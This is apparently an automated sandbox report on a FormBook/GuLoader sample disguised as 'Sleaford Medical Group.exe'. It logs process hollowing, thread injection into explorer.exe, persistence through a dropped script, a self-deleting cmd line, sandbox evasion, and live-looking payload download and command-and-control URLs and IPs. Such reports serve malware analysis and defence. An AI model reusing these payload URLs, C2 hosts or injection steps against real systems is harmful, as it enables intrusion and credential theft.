      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037E0050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037E0050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038090AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EA830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EA830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EA830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EA830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0385B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0385B8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0385B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0385B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0385B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0385B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037DB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037DB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037DB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037DB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C58EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03847016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03847016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03847016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03894015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03894015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C40E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C40E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C40E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037FF0BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037FF0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037FF0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03882073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C9080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03891074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03847794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03847794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03847794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037DFF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037DEF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037FE730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EF716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037FA70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037FA70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038037F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0389070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0389070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0385FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0385FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03898F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D8794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0385FE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038446A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03890EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03890EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03890EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03808EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0387FEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037CE620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03898ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037FA61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037FA61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037CC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037CC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037CC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F8E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03881608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F16E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D76E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F36CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0387FE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0388AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0388AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EC577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EC577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038905AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038905AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037E7D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\help.exeProcess token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\explorer.exeNetwork Connect: 104.21.89.82 80
      Maps a DLL or memory area into another processShow sources
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Modifies the context of a thread in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeThread register set: target process: 3388
      Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 3388
      Queues an APC in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeThread APC queued: target process: C:\Windows\explorer.exe
      Sample uses process hollowing techniqueShow sources
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeSection unmapped: C:\Windows\SysWOW64\help.exe base address: E60000
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeProcess created: C:\Users\user\Desktop\Sleaford Medical Group.exe 'C:\Users\user\Desktop\Sleaford Medical Group.exe'
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exe C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exe
      Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Sleaford Medical Group.exe'
      Source: explorer.exe, 00000018.00000000.501184741.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
      Source: explorer.exe, 00000018.00000002.734973768.0000000001980000.00000002.00000001.sdmp, oversad.exe, 0000001A.00000002.732448844.0000000000C40000.00000002.00000001.sdmp, help.exe, 0000001C.00000002.737092327.0000000004C30000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 00000018.00000000.524058813.000000000871F000.00000004.00000001.sdmp, oversad.exe, 0000001A.00000002.732448844.0000000000C40000.00000002.00000001.sdmp, help.exe, 0000001C.00000002.737092327.0000000004C30000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000018.00000002.734973768.0000000001980000.00000002.00000001.sdmp, oversad.exe, 0000001A.00000002.732448844.0000000000C40000.00000002.00000001.sdmp, help.exe, 0000001C.00000002.737092327.0000000004C30000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000018.00000002.734973768.0000000001980000.00000002.00000001.sdmp, oversad.exe, 0000001A.00000002.732448844.0000000000C40000.00000002.00000001.sdmp, help.exe, 0000001C.00000002.737092327.0000000004C30000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Stealing of Sensitive Information:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000001C.00000002.731485750.0000000003530000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000002.731784931.0000000003560000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.551412840.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.584974843.000000001E150000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000002.730784207.0000000002EC0000.00000040.00000001.sdmp, type: MEMORY
      Yara detected Generic DropperShow sources
      Source: Yara matchFile source: Process Memory Space: help.exe PID: 6328, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: Sleaford Medical Group.exe PID: 5356, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000001C.00000002.731485750.0000000003530000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000002.731784931.0000000003560000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.551412840.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.584974843.000000001E150000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000002.730784207.0000000002EC0000.00000040.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsScripting11Registry Run Keys / Startup Folder11Process Injection512Rootkit1Credential API Hooking1Security Software Discovery721Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsShared Modules1Boot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder11Virtualization/Sandbox Evasion22Input Capture1Virtualization/Sandbox Evasion22Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection512Security Account ManagerProcess Discovery2SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting11LSA SecretsSystem Information Discovery32SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 358420 Sample: Sleaford Medical Group.exe Startdate: 25/02/2021 Architecture: WINDOWS Score: 100 39 www.waymakers.site 2->39 41 waymakers.site 2->41 55 Malicious sample detected (through community Yara rule) 2->55 57 Multi AV Scanner detection for submitted file 2->57 59 Yara detected GuLoader 2->59 61 9 other signatures 2->61 11 Sleaford Medical Group.exe 1 2 2->11         started        signatures3 process4 signatures5 71 Creates autostart registry keys with suspicious values (likely registry only malware) 11->71 73 Tries to detect Any.run 11->73 75 Hides threads from debuggers 11->75 14 Sleaford Medical Group.exe 9 11->14         started        process6 dnsIp7 45 01677937777.burrow.io 159.203.144.58, 443, 49734 DIGITALOCEAN-ASNUS United States 14->45 35 C:\Users\user\AppData\Local\...\oversad.exe, PE32 14->35 dropped 37 C:\Users\user\AppData\Local\...\oversad.vbs, ASCII 14->37 dropped 47 Modifies the context of a thread in another process (thread injection) 14->47 49 Tries to detect Any.run 14->49 51 Maps a DLL or memory area into another process 14->51 53 3 other signatures 14->53 19 explorer.exe 14->19 injected file8 signatures9 process10 dnsIp11 43 www.landingberg.com 104.21.89.82, 49745, 80 CLOUDFLARENETUS United States 19->43 63 System process connects to network (likely due to code injection or exploit) 19->63 23 help.exe 19->23         started        26 wscript.exe 19->26         started        signatures12 process13 signatures14 65 Modifies the context of a thread in another process (thread injection) 23->65 67 Maps a DLL or memory area into another process 23->67 69 Tries to detect virtualization through RDTSC time measurements 23->69 28 cmd.exe 1 23->28         started        30 oversad.exe 1 26->30         started        process15 signatures16 33 conhost.exe 28->33         started        77 Multi AV Scanner detection for dropped file 30->77 79 Machine Learning detection for dropped file 30->79 81 Tries to detect virtualization through RDTSC time measurements 30->81 process17

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Sleaford Medical Group.exe48%VirustotalBrowse
      Sleaford Medical Group.exe11%ReversingLabs
      Sleaford Medical Group.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exe11%ReversingLabs

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      22.3.Sleaford Medical Group.exe.8cfbb0.0.unpack100%AviraTR/Patched.GenDownload File

      Domains

      SourceDetectionScannerLabelLink
      01677937777.burrow.io5%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      https://www.landingberg.com/twy/?pPX=elx0UibK0%Avira URL Cloudsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://cps.letsencrypt.org00%URL Reputationsafe
      http://cps.letsencrypt.org00%URL Reputationsafe
      http://cps.letsencrypt.org00%URL Reputationsafe
      https://01677937777.burrow.io/XzsF0%Avira URL Cloudsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.landingberg.com/twy/?pPX=elx0UibK+4/Nbm+qsvCMZ/KEfRavAHzyccJHHIU1h6WwAO+M5fT0/YOmYv0X1fYwTcwa&Hp=V6AHd0O0h0%Avira URL Cloudsafe
      https://01677937777.burrow.io/spark/binwhyte_utZnZr121.binT0%Avira URL Cloudsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://r3.i.lencr.org/00%URL Reputationsafe
      http://r3.i.lencr.org/00%URL Reputationsafe
      http://r3.i.lencr.org/00%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      https://01677937777.burrow.io/spark/binwhyte_utZnZr121.bin0%Avira URL Cloudsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      https://01677937777.burrow.io/spark/binwhyte_utZnZr121.bin380%Avira URL Cloudsafe
      http://r3.o.lencr.org00%URL Reputationsafe
      http://r3.o.lencr.org00%URL Reputationsafe
      http://r3.o.lencr.org00%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      https://01677937777.burrow.io/uzTF0%Avira URL Cloudsafe
      http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
      http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
      http://cps.root-x1.letsencrypt.org00%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      01677937777.burrow.io
      		159.203.144.58
      		truefalseunknown
      www.landingberg.com
      		104.21.89.82
      		truetrue
        		unknown
        waymakers.site
        		184.168.131.241
        		truefalse
          		unknown
          www.waymakers.site
          		unknown
          		unknowntrue
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://www.landingberg.com/twy/?pPX=elx0UibK+4/Nbm+qsvCMZ/KEfRavAHzyccJHHIU1h6WwAO+M5fT0/YOmYv0X1fYwTcwa&Hp=V6AHd0O0htrue
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://www.landingberg.com/twy/?pPX=elx0UibKhelp.exe, 0000001C.00000002.736924910.00000000041BF000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpfalse
              		high
              http://www.fontbureau.comexplorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpfalse
                		high
                http://www.fontbureau.com/designersGexplorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpfalse
                  		high
                  http://www.fontbureau.com/designers/?explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpfalse
                    		high
                    http://www.founder.com.cn/cn/bTheexplorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://cps.letsencrypt.org0Sleaford Medical Group.exe, 00000016.00000002.567348461.0000000000899000.00000004.00000020.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers?explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpfalse
                      		high
                      https://01677937777.burrow.io/XzsFSleaford Medical Group.exe, 00000016.00000002.566373992.0000000000870000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.tiro.comexplorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designersexplorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpfalse
                        		high
                        https://01677937777.burrow.io/spark/binwhyte_utZnZr121.binTSleaford Medical Group.exe, 00000016.00000002.566373992.0000000000870000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.goodfont.co.krexplorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
